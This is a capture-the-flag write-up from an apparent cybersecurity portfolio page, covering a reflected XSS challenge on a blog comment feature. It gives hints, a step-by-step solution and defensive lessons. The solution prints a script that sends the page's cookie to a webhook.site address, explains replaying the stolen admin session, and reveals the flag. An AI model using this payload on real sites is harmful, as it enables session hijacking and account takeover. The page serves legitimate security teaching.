Ainsley Woo - Hack the Threat | Cybersecurity Portfolio

Connection Information

Objective

Exploit a reflected XSS vulnerability to exfiltrate the admin's session cookie.

Scenario

You find a blog with a comment feature. The site reflects your input directly into the page without proper sanitization. The admin regularly reviews new comments. Steal the admin's cookie to get the flag.

Hints

Hint 1

HTML tags are not filtered in the comment section

Hint 2

The admin bot visits every new comment within 30 seconds

Hint 3

You'll need to send the cookie to your server to capture it

Hint 4

Consider using a webhook service to receive the data

Spoiler Warning: The solution below contains the complete walkthrough. Try to solve the challenge yourself first!

Solution

This challenge demonstrates reflected XSS where user input is directly rendered in the HTML without sanitization.

Step 1: Test for XSS

Submit a basic XSS payload in the comment field to confirm the vulnerability.

step-1.sh

<script>alert('XSS')</script>

Step 2: Set Up Cookie Capture

Create a webhook or use a service like webhook.site to receive stolen cookies.

Step 3: Craft the Payload

Create a payload that steals the cookie and sends it to your webhook.

step-3.sh

<script>
fetch('https://webhook.site/your-unique-id?cookie=' + document.cookie);
</script>

Step 4: Submit and Wait

Submit the payload as a comment and wait for the admin bot to visit. Check your webhook for the captured cookie.

Step 5: Use the Cookie

Set the stolen cookie in your browser and access the admin panel to retrieve the flag.

Flag

CTF{xss_c00k13_th3ft_pwn3d}

Key Learnings

Never trust user input - always sanitize and escape

Use Content Security Policy (CSP) headers to prevent XSS

HttpOnly cookies prevent JavaScript access

XSS can lead to account takeover and data theft

Back to All Challenges

XSS Reflected Attack

Connection Information

Objective

Scenario

Hints

Solution

Step 1: Test for XSS

Step 2: Set Up Cookie Capture

Step 3: Craft the Payload

Step 4: Submit and Wait

Step 5: Use the Cookie

Flag

Key Learnings

Solution

Step 1: Test for XSS

Step 2: Set Up Cookie Capture

Step 3: Craft the Payload

Step 4: Submit and Wait

Step 5: Use the Cookie

Flag

Key Learnings